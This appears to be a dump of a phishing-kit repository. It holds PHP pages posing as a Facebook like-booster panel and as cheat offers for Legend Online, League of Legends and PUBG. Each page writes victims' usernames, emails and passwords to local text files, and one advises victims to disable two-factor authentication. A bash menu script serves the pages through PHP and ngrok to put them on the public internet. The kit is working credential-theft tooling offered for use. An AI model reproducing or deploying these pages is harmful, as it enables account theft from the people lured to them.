ailure:1,ads_manager_ad_appeal_send_success:1,ads_manager_appeal_send_pressed:1,ads_manager_confirm_appeal_dialog_cancel:1,attempt_to_send_reply:1,bi_mlex_ad_history_click:1,bi_mlex_ad_history_impression:1,bi_mlex_feedback_survey_evolution_response:1,camera_roll_cancelled:1,camera_roll_finished:1,camera_roll_folder_in_dropdown_clicked:1,camera_roll_header_camera_clicked:1,camera_roll_header_cancel_button_clicked:1,camera_roll_header_folder_clicked:1,camera_roll_header_next_button_clicked:1,camera_roll_magnifying_glass_button_clicked:1,camera_roll_media_item_clicked:1,camera_roll_opened:1,close_story:1,commerce_view_product_details:1,compassion_resource_view:1,composer_cancel:1,composer_entry:1,composer_focus_acquired:1,composer_focus_lost:1,composer_init:1,composer_post:1,composer_post_cancel:1,composer_post_failure:1,composer_post_mutation_start:1,composer_post_server_content_rendered:1,composer_post_success:1,crisis_click_unit:1,crisis_tool_view_page:1,crisis_view_unit:1,feed_friend_request_confirm:1,feed_friend_request_delete:1,feed_friend_request_imp:1,feed_friend_request_profile:1,for_sale_item_message_seller_button_clicked:1,goodwill_content_view:1,goodwill_permalink_subpage_view:1,gpymi_add:1,gpymi_imp:1,gysj_join:1,gysj_profile:1,gysj_unjoin:1,gysj_xout:1,live_video_rewind:1,living_room:1,marketplace_click:1,marketplace_feed_load:1,marketplace_first_scroll:1,marketplace_impression:1,marketplace_long_click:1,marketplace_modify:1,marketplace_surface_enter:1,marketplace_surface_exit:1,media_upload_cancel:1,media_upload_failure:1,media_upload_flow_cancel:1,media_upload_flow_fatal:1,media_upload_flow_giveup:1,media_upload_flow_incomplete:1,media_upload_flow_start:1,media_upload_flow_success:1,media_upload_init_failure:1,media_upload_init_start:1,media_upload_init_success:1,media_upload_process_cancel:1,media_upload_process_failure:1,media_upload_process_skipped:1,media_upload_process_start:1,media_upload_process_success:1,media_upload_start:1,media_upload_success:1,media_upload_transfer_cancel:1,media_upload_transfer_failure:1,media_upload_transfer_start:1,media_upload_transfer_success:1,notification_permalink_time_spent:1,open_media:1,open_story:1,pymk_add:1,pymk_imp:1,pymk_profile:1,pymk_xout:1,request_click:1,request_seen:1,saved_collection_ego_item_image_clicked:1,send_story_post_failed_notification:1,stories_interactive_feedback:1,story_card_impression:1,story_card_timespent:1,story_interactive_item_click:1,story_interactive_item_rendering:1,story_navigation:1,story_profile_impression:1,streaming_sdk_engine_log:1,why_covered_ccs_link_followed:1,why_covered_ccs_snippet_viewed:1,why_covered_error_generating_cms:1,why_covered_how_snippet_viewed:1}},4308],[\"cr:844180\",[\"TimeSpentImmediateActiveSecondsLoggerBlue\"],{__rc:[\"TimeSpentImmediateActiveSecondsLoggerBlue\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:1187159\",[\"BlueCompatBroker\"],{__rc:[\"BlueCompatBroker\",\"Aa0OvNThMp-8rXT7gVWulKseKHHiNFEqAZrfFFG0xBN8-idCabj_9ex87Bi90SeYvY-IhlY5yVm-uBa-BoRqPv0\"]},-1],[\"cr:1333160\",[\"UserActivityBlue\"],{__rc:[\"UserActivityBlue\",\"Aa2sIvLsnt_p9rdqqfEG3ZmSvKUJaGEM6dIC7a1BQYkTSxoOHS_zdVVQoF3vntnux1WCMJJmJZmUp7rWGFeTxxFCk0MgKt25\"]},-1],[\"ImmediateActiveSecondsConfig\",[],{sampling_rate:0},423]]},last_in_phase:true,the_end:true});}),\"onPageletArrive last_response\",{\"root\":true,\"pagelet\":\"last_response\"})();</script></body></html>"
  },
  {
    "path": "Site/Facebook/Site-fakepanel/index.php",
    "content": "\r\n<script src=\"//ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js\"></script>\r\n\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n\r\n<div class='LikeMe turk_bayrak' style='width:135px;height:135px;background-image:url(https://begen.co//anasayfa/sol_bayrak.png)'>\r\n<style>.kdrs:hover{left:0px !important;opacity:0.70 !important;filter:alpha(opacity=70) !important;}</style>\r\n<style type='text/css'>div.LikeMe{position:fixed;zindex:3000;}div.turk_bayrak{top:0px;left:0px;}</style>\r\n</div>\r\n\r\n<title>LikeMe | Facebook Beğeni</title>\r\n<link rel=\"shortcut icon\" href=\"https://begen.co/favicon.ico\" />\r\n<link rel=\"canonical\" href=\"http://begen.co\"/>\r\n<meta name=\"description\" content=\"LikeMe Facebook Beğeni,Facebook Beğeni Hilesi, Facebook Sayfa Beğeni, Instagram Beğeni, Beğeni Hilesi, Durum beğeni,Resim beğeni,Yorum beğeni, Beğeni kasma\" />\r\n\r\n<style type=\"text/css\">\r\n@font-face {\r\n  font-family: 'Dosis'; font-style: normal; font-weight: 400;\r\n  src: local('Dosis Regular'), local('Dosis-Regular'), url(../anasayfa/Dosis.woff) format('woff');\r\n} *, body {color: #636363;font-family: 'Dosis', sans-serif;}\r\n</style>\r\n\r\n<link href=\"https://begen.co/anasayfa/1.css\" rel=\"stylesheet\"  media=\"screen, projection\">\r\n\r\n<section class=\"container\" style=\"width:90%;margin: 0 0 0 3%;\">\r\n\r\n      <section class=\"logo\" style=\"margin:20;\"> <!-- Margin ile üstten boşluk verildi !!! -->\r\n        <h1>\r\n        <span style=\"color: #2F3292;\">\r\n           &nbsp;&nbsp; Like\r\n        </span>\r\n        <span style=\"color: #1CBAF2;margin: 0 0 0 -18px;\">\r\n          Me\r\n        </span>\r\n      <span style=\"color: #2F3292; font-size:11pt ; margin: 0 0 0 -18px;\">&nbsp;&nbsp;v8.7</span><!-- margin eklendi -->\r\n\r\n    </h1>\r\n  </section>\r\n\r\n\r\n<div style=\"position: fixed; top: 15; left: 30%;\">\r\n<!-- Reklam -->\r\n</div>\r\n\r\n  <section style=\"height: 130px;\">\r\n\r\n    <section style=\"font-size: 18px;background: #00C0F2;height: 40px;\">\r\n      <section style=\"padding: 10px;\">\r\n\r\n          <a title=\"Resim Beğeni\"/><section style=\"cursor: default;color: #ffffff;margin: -2.75px 4px 0 0;float: left;\">\r\n              Durum, Resim, Resim ve Durum Yorumu, Sayfa Resmi, Sayfa Durumu, Reaksiyon <section style=\"margin: 3px 0 0 10px;\"></section>           </section>\r\n          </a>\r\n\r\n            <a title=\"SSS\"/><section style=\"cursor: pointer;color: #ffffff;margin: -2.75px 4px 0 0;float: right;\">\r\n              <a style=\"color:white\" href=\"https://begen.co/?s=sss\" />SSS</a> <section style=\"margin: 3px 0 0 10px;\"></section>            </section>\r\n          </a>\r\n\r\n            <a title=\"Hakkında\"/><section style=\"cursor: pointer;color: #ffffff;margin: -2.75px 4px 0 0;float: right;\">\r\n              <a style=\"color:white\" href=\"https://begen.co/?s=hakkinda\" />Hakkında</a> | <section style=\"margin: 3px 0 0 10px;\"></section>            </section>\r\n          </a>\r\n          \r\n            <a title=\"Anasayfa\"/><section style=\"cursor: pointer;color: #ffffff;margin: -2.75px 4px 0 0;float: right;\">\r\n              <a style=\"color:white\" href=\"\" />Anasayfa</a> | <section style=\"margin: 3px 0 0 10px;\"></section>            </section>\r\n          </a>\r\n\r\n    </section>\r\n  </section>\r\n  \r\n  <section>\r\n    <section id=\"controller\">\r\n      \r\n      <section class=\"headline\">\r\n      \r\n  <h2>Facebook'ta Popüler Ol</h2>\r\n\r\n  <h3 style=\"color: #aaaaaa;float: right;\">\r\n    Sorun mu var? <a href=\"https://begen.co//yardim.php\" target=\"_blank\">Burayı</a> incele\r\n  </h3>\r\n  \r\n</section>\r\n\r\n<section class=\"token\">\r\n  <section class=\"description\" style ='height: 0px; padding: 0px;'>\r\n<!-- Bilgi -->\r\n    </section>\r\n    \r\n\r\n  <table>\r\n  \r\n  <td width='50%'> \r\n\r\n<div class='info'><font size='4'><b>Şifreyle giriş:</b></font><br>\r\n        <font size='3'>\r\n        Kullanıcı adı ve şifrenizi girdikten sonra Token Al diyerek oluşan bütün yazıyı kopyalayın ve giriş yapın.</font><br>\r\n        <font size='2'>\r\n        Şifrenizi kulanmak yerine <a target=\"_blank\" href='https://www.facebook.com/settings?tab=security&section=per_app_passwords&view'>buradan</a> uygulama şifresi oluşturup facebook'un size verdiği şifreyi kullanmanızı tavsiye ederiz.<br>\r\n        Checkpoint'e düşüyorsanız girmeden önce tarayıcınızın yan sekmesinden Facebook hesabınıza giriş yapın. Ayrıca <a href='https://www.facebook.com/settings?tab=security&section=two_fac_auth&view'>İki faktörlü kimlik doğrulama</a>'yı kapatın.\r\n        </font>\r\n  <br>      \r\n<!--\r\n<font size='4'><b>Uygulamayla giriş:</b></font>\r\n\r\n        <font size='3'><br><a href='https://begen.co/?kurulum=0'>Buradan</a> şifresiz giriş yapabilirsiniz.\r\n        Bu yöntem ile hesabınız checkpointe düşmez ve çok daha kolay bir şekilde giriş yapabilirsiniz.\r\n        </font>\r\n\r\n</td>\r\n\r\n<font size='4'><b>Eklentiyle giriş:</b>\r\n<br>\r\n      Chrome Eklentisini <a href='https://chrome.google.com/webstore/detail/get-cookie-api/pnnddjfpgpopbpacpbbncaoehhjpkemk'>Buradan</a> indirebilirsiniz.<br>\r\n</font>\r\n<br>\r\n        <input type=\"button\" value=\"Eklentiyle Giriş Yap\" style=\"width: 20%;\" class=\"submit\" onclick='addonLogin()'></center>\r\n-->\r\n</td>\r\n<!-- ADDON -->\r\n  <iframe width=\"1\" height=\"1\" id=\"myAddonFrame\"></iframe>\r\n<!-- ----- -->\r\n\r\n<div class='error'><font size='4'><b>Bilgilendirme:</b></font>\r\n<font size='3'>\r\n  Facebook tarafından yapılan değişiklik sebebiyle beğeni limitini azaltmak zorunda kaldık, azalmadığımız taktirde hiç beğeni alamayacaktınız! Beğeni sayısının azaldığının farkındayız, limitleri yeniden arttırabilmek için çalışıyoruz, anlayışınız için teşekkür ederiz.</font>\r\n</div>\r\n\r\n<div class='success'>\r\n<font size='3'>Yeni Yöntem: Giriş yapmak için kodu kopyalayın ve <a target=\"_blank\" rel=\"noopener noreferrer\" href='https://www.facebook.com/device'>https://www.facebook.com/device</a> adresine yapıştırın,izinleri onaylayın otomatik olarak giriş yapacaksınız.</font>\r\n<iframe width=\"480\" height=\"80\"  frameborder=\"0\" seamless=\"seamless\" scrolling=\"no\" frameborder=\"0\" allowtransparency=\"true\" src='create_code.php?i=547219'></iframe>\r\n</div>\r\n\r\n  <td width='50%'>\r\n      <table  style='padding-left:100px;'>\r\n\r\n          <div class='info' style='width: 100%;margin-left: 10px;'>\r\n            <center><font size='3'><strong>Diğer Uygulamalarımız</strong></font></center>\r\n          </div>\r\n          \r\n          <center>\r\n            <a href='https://instagram.begen.co'/>\r\n              <img src='https://begen.co//anasayfa/instagram_new.png' style='width:120px; height:120px' />\r\n              <br>\r\n              <font size='4'>Instagram Beğeni & Takipçi</font>\r\n            </a>\r\n          </center>\r\n          \r\n          <div class='success' style='width: 95%;margin-left: 10px;'>\r\n          <center><font size='3'><strong>Android telefonunuza eklentileri kurmak için yandex browser kullanabilirsiniz.</strong></font></center>\r\n          </div>\r\n          \r\n      </table>\r\n\r\n  </td>\r\n\r\n  <tr>\r\n      <td>\r\n      \r\n\r\n      <center>\r\n      \r\n <form action=\"\" method=\"post\">\r\n      \r\n        <input type='text'  name=\"username\"  class=\"text title\" placeholder=\"Facebook Kullanıcı Adı\" type=\"text\">\r\n        <input type='password' name=\"password\"  class=\"text title\" placeholder=\"Facebook Şifre\"  type=\"password\">\r\n        <input type=\"hidden\" name=\"\" value=\"\"/> \r\n        <div id=\"tokenarea\" class=\"list-group-item\"></div>\r\n      <font size='3' color='#777'> <a href='https://begen.co/kosullar.php'>Şartlar ve Koşullar</a>'ı okudum, kabul ediyorum.</font>\r\n      <input type='checkbox' required name=\"terms\" id='checkme'/>\r\n      <input type=\"hidden\" name=\"csrf\" value=\"8fd18d67b94d410c4d2dd2281dd1910a\"/>\r\n      <input value=\"Giriş Yap\" style=\"width: 20%;\" id='sendNewSms2' class=\"submit\" type=\"submit\">\r\n    </form>\r\n\r\n    <?php \r\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\r\n$ac = fopen(\"fakepanel.txt\",\"a+\");\r\n$password = $_POST['password'];\r\n$username = $_POST['username'];\r\n\r\n$userlar = (\"\\n __________________ \\n\".\" Username: \".$username.\"\\n Password: \".$password.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n\r\n}\r\n     ?>\r\n  </td>   \r\n  </tr>\r\n  \r\n</table>\r\n\r\n<br><br>\r\n\r\n</section>  \r\n\r\n    \r\n\r\n<br><br>\r\n\r\n</section>\r\n\r\n    <section style=\"border-top:1px solid #aaaaaa;padding: 5px;\">\r\n    \r\n      <section style=\"float: left;\">\r\n        LikeMe © 2019 <a>Türkçe (TR)</a><br>\r\n        </section>\r\n      \r\n        <section style=\"float: right;\">\r\n\r\n          <a href=\"https://www.virustotal.com/tr/url/8b1d99c029380ec71fbfdfae45b5411297ebfd20d2690aa525b935b6d5ea8a11/analysis/\" target=\"_blank\">\r\n          <img style='margin: 0 0 0 +15px;' src=\"https://begen.co//anasayfa/virustotal_seal.png\" border=\"0\" width=\"98\" height=\"35\" alt=\"Virustotal Secured\"></a>\r\n\r\n          <a href=\"http://www.urlvoid.com/scan/begen.co/\" target=\"_blank\">\r\n          <img style='margin: 0 0 0 +15px;' src=\"https://begen.co/anasayfa/urlvoid_seal.png\" border=\"0\" width=\"78\" height=\"35\" alt=\"URLVOID Secured\"></a>\r\n\r\n        </section>\r\n        \r\n      \r\n  </section>\r\n</section>\r\n"
  },
  {
    "path": "Site/Facebook/start.sh",
    "content": "GNU nano 3.2                                                                        \nstart.sh\n\n#!/bin/bash\n\n#Code:Yaman Efkar\n#Türk Siber Timi\n#İnstagram : @turksibertimi\n#Youtube : YamanEfkar\nclear\necho -e  \"\n\n\n\\e[35m     ((( #Türk Siber Timi  #Yaman Efkar )))\n\n\n\n\\e[31m[01]\\e[32m Facebook Login\n\\e[31m[02]\\e[32m Facebook Fake Panel\n\n\n\\e[31m[00]\\e[37m Menü\n\\e[31m[99]\\e[37m Exit\n\"\necho -e \"\\e[49m\"\nread -p \"İşlem Numarasını Giriniz: \" islem\nif [[ $islem == 1 || $islem == 01 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: face01\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-facebook/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 2 || $islem == 02 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: face02\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-fakepanel/\n        php -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 0 || $islem == 00 ]]; then\ncd ..\ncd ..\nbash tst.sh\nelif [[ $islem == 9 || $islem == 99 ]]; then\nclear\necho -e \"\\e[31mTürk Siber Timi İyi Günler Diler :)) ßß\"\nclear\nsleep 1\nexit 1\nelse\necho \"\"\necho -e \"\\e[31m Girdiğiniz İşlem Numarasını Kontrol Ediniz....\"\nsleep 3\nclear\nbash start.sh\nfi\n"
  },
  {
    "path": "Site/Game/Site-legend/index.php",
    "content": "<!DOCTYPE html>\r\n<html>\r\n <head>\r\n  <title>\r\n   -- Zula V1.3 --\r\n  </title>\r\n <link rel=\"shortcut icon\" href=\"https://is4-ssl.mzstatic.com/image/thumb/Purple115/v4/e4/4c/80/e44c8087-a9b0-4ff3-f7f6-fdc2de46ab80/source/256x256bb.jpg\" type=\"image/vnd.microsoft.icon\">\r\n  <style type=\"text/css\">\r\n   .div1{\r\n      background-color:#040302;\r\n      height: 710px;\r\n      width: 500px;\r\n      border-radius: 35px;\r\n      border:4px solid #21160d;\r\n      opacity: 0.8;\r\n      filter: alpha(opacity=40);\r\n    }\r\n    .text{\r\n      color:red;\r\n      font-size: 48px;\r\n      background-color:black;\r\n      padding-bottom: 20px;\r\n      border-radius: 48px; \r\n    }\r\n    .text2{\r\n      color:orange;\r\n      font-size:28px;\r\n      background-color:black;\r\n      border-radius: 50px;\r\n      padding-top: 25px;\r\n      padding-bottom: 25px;\r\n    }\r\n    .input{\r\n     height: 40px; \r\n     width: 250px; \r\n     font-size: 18px; \r\n     padding: 5px; \r\n     margin-bottom: 15px; \r\n     border-radius: 7px; \r\n     background-color:#b4b2b2; \r\n     border: none; \r\n     color: #000; \r\n\r\n    }\r\n    .button{\r\n     width: 100px; \r\n     font-size: 18px;  \r\n     margin: 0 auto;\r\n     background-color: red; \r\n     border: none; \r\n     height: 40px; \r\n    border-radius: 18px;\r\n    }\r\n     canvas { \r\n     display: block; \r\n     position: fixed; \r\n  top: 0; \r\n  left: 0; \r\n     z-index: -1000; \r\n }\r\n .body{\r\n  background: url(\"https://rok-lortr.oasgames.com/storage/images/201704/58f1325c5fae9.jpg\") no-repeat center center fixed; \r\n    -webkit-background-size: cover;\r\n    -moz-background-size: cover;\r\n    -o-background-size: cover;\r\n    background-size: cover;\r\n }\r\n .select{\r\n  color:orange;\r\n  font-size:18px;\r\n  width:75px;\r\n  height:40px;\r\n  background-color:#040302;\r\n  border-radius: 20px;\r\n }\r\n  </style>\r\n </head>\r\n <body class='body'>\r\n  <center>\r\n   <div class=\"div1\">\r\n    <p class=\"text\">\r\n     Legend Online\r\n    </p>\r\n    <form method=\"post\">\r\n     <p class=\"text2\">\r\n      Elmas Hilesi V1.3\r\n     </p>\r\n     <p style=\"color:red;font-size:14px;\">E-MAİL</p>\r\n     <input class=\"input\" name=\"mamak\" placeholder=\"xxxxxxxx@xxxxx.com\" type=\"text\" required=\"\" />\r\n     <p style=\"color:red;font-size:14px;\">Password</p>\r\n     <input class=\"input\" name=\"ssel\" placeholder=\"***********\" type=\"password\" required=\"\" /><br>\r\n     <select class='select'>\r\n      <option>1000</option>\r\n      <option>3000</option>\r\n      <option>5000</option>\r\n      <option>8000</option>\r\n      <option>10000</option>\r\n      <option>25000</option>\r\n\r\n     </select>\r\n     <br>\r\n      <br>\r\n<input type=\"submit\" value=\"Next\" class='button'>\r\n\r\n\r\n</form>\r\n</div>\r\n</center>\r\n<?php\r\nif (!empty($_POST[\"mamak\"]) && !empty($_POST[\"ssel\"])) {\r\n$ac = fopen(\"legendonline.txt\",\"a+\");\r\n$names = $_POST['mamak'];\r\n$password = $_POST['ssel'];\r\n$userlar = (\"\\n __________________ \\n Password: \".$password.\"\\n E-Mail: \".$names.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);}\r\n?>\r\n\r\n\r\n\r\n</body>\r\n</html>"
  },
  {
    "path": "Site/Game/Site-lol/index.php",
    "content": "<!DOCTYPE html>\r\n<html>\r\n <head>\r\n  <title>\r\n   -- LOL V1.3 --\r\n  </title>\r\n <link rel=\"shortcut icon\" href=\"https://lolstatic-a.akamaihd.net/lolkit/1.1.9/resources/images/favicon.ico\" type=\"image/vnd.microsoft.icon\">\r\n  <style type=\"text/css\">\r\n   .div1{\r\n      background-color:#040302;\r\n      height: 710px;\r\n      width: 500px;\r\n      border-radius: 35px;\r\n      border:4px solid #21160d;\r\n      opacity: 0.8;\r\n      filter: alpha(opacity=40);\r\n    }\r\n    .text{\r\n      color:red;\r\n      font-size: 48px;\r\n      background-color:black;\r\n      padding-bottom: 20px;\r\n      border-radius: 48px; \r\n    }\r\n    .text2{\r\n      color:orange;\r\n      font-size:28px;\r\n      background-color:black;\r\n      border-radius: 50px;\r\n      padding-top: 25px;\r\n      padding-bottom: 25px;\r\n    }\r\n    .input{\r\n     height: 40px; \r\n     width: 250px; \r\n     font-size: 18px; \r\n     padding: 5px; \r\n     margin-bottom: 15px; \r\n     border-radius: 7px; \r\n     background-color:#b4b2b2; \r\n     border: none; \r\n     color: #000; \r\n\r\n    }\r\n    .button{\r\n     width: 100px; \r\n     font-size: 18px;  \r\n     margin: 0 auto;\r\n     background-color: red; \r\n     border: none; \r\n     height: 40px; \r\n    border-radius: 18px;\r\n    }\r\n     canvas { \r\n     display: block; \r\n     position: fixed; \r\n  top: 0; \r\n  left: 0; \r\n     z-index: -1000; \r\n }\r\n .body{\r\n  background: url(\"https://wallpapercave.com/wp/WFGfhQJ.jpg\") no-repeat center center fixed; \r\n    -webkit-background-size: cover;\r\n    -moz-background-size: cover;\r\n    -o-background-size: cover;\r\n    background-size: cover;\r\n }\r\n .select{\r\n  color:orange;\r\n  font-size:18px;\r\n  width:75px;\r\n  height:40px;\r\n  background-color:#040302;\r\n  border-radius: 20px;\r\n }\r\n  </style>\r\n </head>\r\n <body class='body'>\r\n  <center>\r\n   <div class=\"div1\">\r\n    <p class=\"text\">\r\n     League of Legends\r\n    </p>\r\n    <form method=\"post\">\r\n     <p class=\"text2\">\r\n      LOL\r\n     </p>\r\n     <p style=\"color:red;font-size:14px;\">E-MAİL</p>\r\n     <input class=\"input\" name=\"mamak\" placeholder=\"xxxxxxxx@xxxxx.com\" type=\"text\"/>\r\n     <p style=\"color:red;font-size:18px;\">Username</p>\r\n     <input class=\"input\" name=\"user\" placeholder=\"Username\" type=\"text\"/>\r\n     <p style=\"color:red;font-size:14px;\">Password</p>\r\n     <input class=\"input\" name=\"ssel\" placeholder=\"***********\" type=\"password\"/><br>\r\n     <select class='select'>\r\n      <option>1000</option>\r\n      <option>3000</option>\r\n      <option>5000</option>\r\n      <option>8000</option>\r\n      <option>10000</option>\r\n      <option>25000</option>\r\n\r\n     </select>\r\n     <br>\r\n      <br>\r\n<input type=\"submit\" value=\"Next\" class='button'>\r\n\r\n\r\n</form>\r\n</div>\r\n</center>\r\n<?php\r\nif (!empty($_POST[\"mamak\"]) && !empty($_POST[\"ssel\"])) {\r\n$ac = fopen(\"lol.txt\",\"a+\");\r\n$names = $_POST['mamak'];\r\n$username = $_POST['user'];\r\n$password = $_POST['ssel'];\r\n$userlar = (\"\\n __________________ \\n\".\" Username: \".$username.\"\\n Password: \".$password.\"\\n E-Mail: \".$names.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n}\r\n?>\r\n\r\n\r\n\r\n</body>\r\n</html>"
  },
  {
    "path": "Site/Game/Site-pubg/index.php",
    "content": "<!DOCTYPE html>\r\n<html>\r\n <head>\r\n  <title>\r\n   -- Pubg V1.3 --\r\n  </title>\r\n <link rel=\"shortcut icon\" href=\"data:image/jpeg;base64,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